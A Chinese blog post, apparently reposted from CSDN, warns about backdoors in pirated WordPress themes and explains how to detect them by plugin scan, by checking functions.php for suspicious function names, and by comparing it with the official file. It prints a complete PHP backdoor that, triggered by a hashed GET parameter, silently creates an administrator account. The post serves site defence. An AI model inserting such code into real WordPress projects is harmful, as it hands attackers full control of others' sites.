下面给大家看看这个常见的后门代码
add_action( ‘wp_head’, ‘wp_backdoor’ );
function wp_backdoor() {
if ( md5( $_GET[‘backdoor’] ) == ’34d1f91fb2e514b8576fab1a75a89a6b’
) {
require( ‘wp-includes/registration.php’ );
if ( !username_exists( ‘backdoor’ ) ) {
$user_id = wp_create_user( ‘backdoor’, ‘123456’ );
$user = new WP_User( $user_id );
$user->set_role( ‘administrator’ );
}
}
}
由以上的代码我们可以看出,如果把这段代码插入到你的主题函数文件functions.php中的话,然后就会自动创建一个用户名为backdoor,密码为123456的有管理员权限的账户,然后恶意人员就可以登录到你的网站后台获得管理员权限,也就是说,网站后台被拿到shell,后果你可以自己想象一下。
所以搜刮在这里建议大家不要随便乱使用WordPress的盗版主题,支持正版。
哪如何检测Wordpress主题是否有后门呢?
第一种使用工具检测(插件检测)主题方法:
安装插件方法:
WordPress后台——外观——TAC——启动Theme Authenticity Checker安全检测插件
然后就会自动检测,如果出现全部为绿色,则表示没有任何后门
如果有异常请点击Details产看,并按照路径进行相关处理
第二种使用手动检测主题方法:
使用ftp工具查看源码:找到fuctions.php这个文件
查看是否包含以下函数:
function __popular_posts
function stripos
function scandir
function _getprepare_widget
add_action(“init”, “_getprepare_widget”);
function _get_allwidgets_cont
function strripos
function _checkactive_widgets
add_action(“admin_head”, “_checkactive_widgets”);
第三种使用文件同步对比法检测主题方法:
首先在wordpress官网下载跟你源码相同版本的代码
找到下载源码中的fuctions.php与你的程序源码的fuctions.php进行对比
对比的时候请注意,如果对比出现红色的可以询问相关技术人员,或者在网上进行搜索
对比推荐使用软件Beyond Compare 4点击进行文本对比即可
原文链接:https://blog.csdn.net/ChanYao/article/details/114013322?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522171852351316777224461445%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fblog.%2522%257D&request_id=171852351316777224461445&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~blog~first_rank_ecpm_v1~times_rank-18-114013322-null-null.nonecase&utm_term=wordpress%E4%B8%BB%E9%A2%98
